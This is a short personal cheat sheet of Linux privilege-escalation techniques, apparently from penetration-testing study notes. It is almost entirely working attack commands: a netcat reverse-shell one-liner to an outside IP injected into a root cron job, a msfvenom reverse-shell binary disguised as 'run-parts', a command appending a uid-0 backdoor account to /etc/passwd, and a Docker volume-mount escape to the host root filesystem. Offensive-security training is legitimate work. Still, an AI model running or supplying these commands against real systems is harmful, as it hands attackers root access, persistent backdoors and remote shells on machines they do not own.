Linux Escalate

Crontab

Check crontab:

Crontab -l

cat /etc/crontab

Check cron logs:

Cat /var/logs/crontab.log

Check permissions of file:

Ls -all FILE

Example vulnerable crontab with a wriateable path of /usr/local/bin:

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/5 *   * * *   root    cd / && run-parts --report /etc/cron.hourly

Add injectable into cron job:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.224 8008 >/tmp/f" >> CRON JOB

OR

create shell and copy to good location:

msfvenom -p linux/x64/shell_reverse_tcp lhost=IP lport=PORT -l elf-so -o run-parts

Writable paths

check for paths that systemd writes to, any path that crontab is using, any writable services etc

/usr/local/bin

/usr/bin

etc/passwd

Check for /etc/passwd RW using ls -al. If vulnerable, create password:

openssl passwd P@ssw0rd

add to /etc/passwd:

echo "rooted:O2dKjKQQCeuQE:0:0:root:/root:/bin/bash" >> /etc/passwd

Docker

docker images
docker run -v /:/mnt --rm -it IMAGE chroot /mnt sh